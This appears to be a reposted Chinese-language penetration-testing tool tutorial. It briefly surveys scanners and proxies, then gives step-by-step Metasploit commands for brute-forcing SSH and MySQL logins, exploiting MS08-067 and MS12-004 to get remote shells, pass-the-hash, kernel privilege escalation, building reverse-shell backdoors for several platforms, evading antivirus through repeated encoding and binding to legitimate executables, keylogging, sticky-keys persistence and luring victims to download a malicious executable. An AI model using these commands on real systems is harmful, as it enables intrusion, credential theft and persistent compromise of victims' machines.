這兩款都是比較大型的漏洞掃描器。操作也比較簡單,windows下的圖形化界面,填入目標和其他配置即可。awvs 截圖:

AppScan 截圖: 

AppScan 在掃描開始之前會讓選擇報告存放比特置。

兩款漏掃都有詳細的漏洞說明。

w3af

​官網:https://w3af.org/
w3af 使用:https://www.kancloud.cn/wintry/p-tools/598530
W3af 安裝與基本應用(windows10版):https://blog.csdn.net/weixin_43817670/article/details/106615466

W3af 的核心代碼和插件是完全用 Python 編寫的,也是一款非常强大的掃描工具,掃描漏洞的能力也是非常的强,缺點就是他不會自動爬取子域。

抓包、改包

Burpsuite

Burpsuite 也是一款滲透神器,很多大牛小菜都在用。

Fiddler

Fiddler 也是很强大、很好用的 Web 調試工具。

charles

跟 fiddler 一樣。

Wireshark

非常有名的抓包工具。網絡協議分析利器。

抓包獲取QQ好友IP地址的例子吧!
1.打開 wireshark 開始抓包
2.給 QQ 好友打語音或視頻電話(對方不用接通,在線就行)
3.Ctrl + F 鍵進行搜索

1,選擇搜索 “字符串”;
2,選擇搜索 “分組詳情”;
3,填寫搜索數據 “020048″;   020048就是 QQ UDP 72字節的報文頭 

如下圖,IP 已出

漏洞 利用

Hydra

Hydra 被稱為爆破利器,kali 中內置。

用法:hydra <參數> <IP地址> <服務名>  

hydra 部分參數:( hydra 的參數是區分大小寫的 ) 

  • -R 繼續從上一次的進度開始爆破  
  • -s <port> 指定端口  
  • -l <username> 指定登錄的用戶名  
  • -L <username-list> 指定用戶名字典  
  • -p <password> 指定密碼  
  • -t <number> 設置線程數  
  • -P <passwd-list> 指定密碼字典  
  • -v 顯示詳細過程  

實例:hydra -l root -P /tmp/pass.txt -t 4 -v 192.168.57.101 ssh    // 爆破ssh登錄密碼

metasploit

神器,可以黑掉整個地球。。。

網絡服務滲透攻擊面

Windows 平臺根據網絡服務攻擊面的類別來分,可分為三大類

  • 1. 針對 Windows 系統自帶網絡服務 的滲透攻擊。
    NetBios:UDP137、138、TCP139,MS03-034
    SMB(服務器消息快):TCP445、NBT間接用TCP139接收數據,MS10-012、MS10-054 MSRPC(微軟遠程過程調用):TCP139、445,MS05-039、MS09-026、
    MS08-067 RDP(遠程桌面):TCP3389,MS12-020
  • 2. 針對  Windows 系統上微軟網絡服務 的滲透攻擊。
    IIS,MS08-062、MS09-053、MS10-040 MS SQL xp_cmdshell DNS,MS07-029
  • 3. 針對 Windows 系統上第三方網絡服務 的滲透攻擊。
    Apache Tomcat  MYSQL  用Exploit利器mona.py繞過Windows 7下的DEP+ASLR安全組合。 經典案例漏洞,MS06-040,MS07-029,MS08-067、MS11-058、MS12-020

如何使用攻擊載荷模塊

  • 1. 查看載荷信息:info windows/exec  //假設要查看這個載荷的信息
  • 2. 管理攻擊載荷模塊的Shellcode:msfpayload windows/exec CMD=dir C //導出成C語言數組的完整Shellcode。
  • 3. 查看 Shellcode 匯編代碼:msfpayload windows/exec CMD=dir R | ndisasm -u
  • 4. 昇級和更新:獲取新的攻擊代碼。apt update && apt upgrade && apt dist-upgrade -y

端口掃描

  • 一、調用 nmap 掃描:開啟 msfconsole 後,直接 nmap -v -sV 101.200.44.12
  • 二、MSF 掃描模塊 -- use auxiliary/scanner/portscan/syn
        search portscan  // 搜索端口掃描模塊
        use auxiliary/scanner/portscan/syn  // 使用syn掃描模塊
        show options     // 顯示模塊可操作選項
        set ....         // 設置具體選項
        run              // 開始掃描,運行
  • SMB 掃描獲取系統信息

        use auxiliary/scanner/smb/smb_version
        show optionsset RHOSTS 192.168.1-200
        // 可以設置單個IP或者範圍,set THREADS 10   //設置線程

服務識別

  • SSH

        use auxiliary/scanner/ssh/ssh_version
        show optionsset RHOSTS 192.168.0.10 
        //設置多個ip 192.168.0.11 192.168.0.55run

  • FTP:use auxiliary/scanner/ftp/ftp_versionset RHOSTS *run

密碼嗅探

use auxiliary/sniffer/psnufflerun //可以嗅探FTP

SNMP 掃描與枚舉

search SNMP
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS *

枚舉

use auxiliary/scanner/snmp/snmp_enumset RHOST *
set THREADS 10
run

SMB 登錄驗證

use auxiliary/scanner/smb/smb_lo
show options
set RHOSTS *
set SMBuser  administrator
set THREADS 10
run

VNC 身份認證

use auxiliary/scanner/vnc/vnc_none_auth
show options
set RHOSTS *
set THREADS 50
run

WMAP ( 輕量級測試工具,檢測常見的Web漏洞 )

service postgresql start  //先啟動數據庫
msfconsole       // 再啟動msf
db_status        // msf下輸入,查看數據庫狀態 msfdb init可以初始化數據庫
load wmap        // 載入wmap
wmap_targets -h  // 查看幫助
wmap_sites -a http://www.51xkx.cn     // 添加URL
wmap_sites -l                         // 查看配置的URL
wmap_targets -t http://121.42.88.105  // 添加url對應的IP
wmap_targets -l                       // 查看是否寫入成功
wmap_run -h                           // 查看運行選項
wmap_run -t                           // 選擇運行方式,加載
wmap_run -e                           // 開始測試
wmap_vulns -l                         // 掃描完成後查看結果

遠程代碼執行

search 08-067  (Win 2003、xp)
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST *
show payloads           //查看可用攻擊載荷
set payload windows/meterpreter/reverse_tcp
show optionsset LHOST * // 設置本機IP,如果是攻擊外網,本身必須是外網ip
info 或者show targets   // 查看系統版本信息
set target 17           // 設置目標版本信息 (只有08-067不能自動識別版本號,其他的可以自動獲取)
show options            // 檢查設置
exploit                 // 開始攻擊
shell                   // 獲取目標cmd-shell

MIDI 文件解析遠程代碼執行

影響範圍 win2003、winxp、win7
search 12-004
use exploit /windows/browser/ms12_004_midi
show options
set SRVHOST *   // 設置本機IP
set URIPATH /   // 把網址後綴改成'/'
exploit         // start exploit
sessions        // 查看會話
sessions -i 1   // 連接會話
shell           // 連接shell

口令安全

search mysql_login   // 搜索 mysql 登錄破解利用模塊,ssh 等可以登陸的也行
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 127.0.0.1*
set USERNAME root
set PASS_FILE /root/1.txt
set THREADS 50
exploit

Hash 值傳遞滲透

  • 1. 在不知道密碼的情况下,獲得 meterprete 後:meterpreter>hashdumpset smbpass   // 獲取到的 hash 值
  • 2. 在知道密碼的情况下:直接登錄就行

NDProxy 內核提權

獲取 meterpreter 情况下,權限小,用這個洞來提昇權限

search 14-002
use exploit/windows/local/ms_ndproxy
show options
set session 1 // 選擇會話
exploit
getuid        // 查看當前權限
getsystem     // 這個命令也可以用來提取

多種後門生成

metasploit 可以生成多鐘後門

windows
Linux msfpayload linux/x86/shell_reverse_tcp LHOST=* LPORT=* x>linux
Java  msfpayload java/meterpreter/reverse_tvp LHOST=* LPORT=* w>123.jar
php
(msfpayload php/meterpreter/reverse_tcp LHOST=* LPORT=* R | msfencode -e php/base64 -t raw -o 123.php)
asp
aspx
Android
msfpayload android/meterpreter/reverse_tcp LHOST=* LPORT=* R >1.apk
完整過程
msfpayload windows/meterpreter/reverse_tcp LHOST=本地ip  LPORT=1234 x >123.exe       
//生成windows後門攻擊載荷
ls //查看生成後門所在當前文件夾在
msf監聽
search handler
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set LHOST *
set LPORT 1234
exploit
目標運行後門後,會反彈shell

內網滲透

獲得shell之後需要對C段進行一次掃描

meterpreter>run get_local_subnets  // 獲取網卡
run autoroute -s 192.168.48.0/24   // 掃描整個C段
在 shell 中執行,net view 查看域
若有域控在 meterpreter 劫持它的域管理
use incognito     // 調用模塊
list_tokens -u    // 查看它都有什麼域
impersonate_token 域管理
shell             // 獲得域管理的shell

如果沒有域管理

use auxiliary/sniffer/psnufflerun  //嗅探登錄密碼 FTP

免殺 payload

免殺例子

加殼、改殼、花指令、源碼免殺、改特征碼

首先還是先生成一個後門

msfpayload windows/shell/reverse_tcp LHOST= * LPORT= * R | msfencode -e x86

/shikata_ga_nai -t exe >123.exe

//可以多種編碼效果更好

msfencode -l //查看有多少可用編碼

msfpayload windows/shell/reverse_tcp LHOST= * LPORT= * R | msfencode -e

x86/shikata_ga_nai -c 8 -t raw | msfencode -e x86/countdown -c 6 -t exe -o /666.exe

//多次編碼

msfpayload windows/shell/reverse_tcp LHOST= * LPORT= * R | msfencode

 -t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20

//綁定正常的文件

多種編碼 + 多次編碼 + 綁定正常的可執行程序

玩轉不一樣的 XSS

search keylogger             // 搜索相關模塊
use ....javascript_keylogger 那個模塊
show options
set DEMO true     // 啟用官方的DEMO
set URIPATH  /    // 偽裝url
set srvport 80    // 設置服務端口80
run

類似釣魚網站,記錄鍵盤,感覺沒什麼卵用

維持訪問(種植後門)

meterpreter>run metsvc -A   // 種植後門
msf>use exploit/multi/handler
set payload windows/metsvc_bind_tcp
show options
set LPORT 生成後門的端口
set RHOST *
exploit

主動連接到 shell,在服務器上才行

第二種方法,鍵盤記錄後門

meterpreter>keyscan_start  // 開啟鍵盤記錄
meterpreter>keyscan_dump   // 查看鍵盤記錄結果

第三種shift後門

meterpreter>shell
CD C:\windows\system32
cacls sethc.exe /t /e /G Administrators:f
cacls cmd.exe /t /e /G Administrators:f
ren sethc.exe aaa.exe
ren cmd.exe sethc.exe

使用 Metasploit 創建反向 shell

  • 1. 首先創建反向 shell。
        msfvenon -p windows/meterpreter/reverse_tcp LHOST=192.168.0.100
        LPORT=4443 -f exe > cute_dolphin.exe
  • 2. 創建監聽連接器
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set lhost 192.168.0.100 set lport 4443
        set ExitOnSession false
        set AutorunScript post/windows/manage/smart_migrate
        exploit -j -z
  • 3. kali 已經准備就緒,啟動 Apache 程序:service apache2 start
  • 4. 然後將惡意文件複制到Web服務器文件夾內:cp cute_dolphin.exe /var/www/html/
  • 5. 引誘受害者訪問我們的陷阱:http://192.168.0.100/cute_dolphine.exe
  • 6. 查看活動連接,命令:sessions
  • 7. 如果打算和會話交互,可以使用 -i 選項:sessions -i 1
  • 8.  我們會看到 meterpreter 連接,可以查看被入侵的系統信息 sysinfo或者執行系統shell shell

sqlmap --- sql 注入

sql 注入神器。。。

Beef --- 瀏覽器攻擊框架

BeEF 是瀏覽器攻擊框架的簡稱,是一款專注於瀏覽器端的滲透測試工具。

antSword ---  xss 管理後臺

中國劍蟻,跨平臺版的 中國菜刀

xss 在線工具

前端滲透工具

火狐瀏覽器插件

  • hackbar 手注,編碼
  • firebug 開發者工具,調試 js 脚本(瀏覽器版本:4.9.0.2)
  • Modify 修改 header、cookie 的工具
  • Noscript,進行一些 js 的阻斷;

原网站

版权声明
本文为[擒賊先擒王]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/187/202207060919582259.html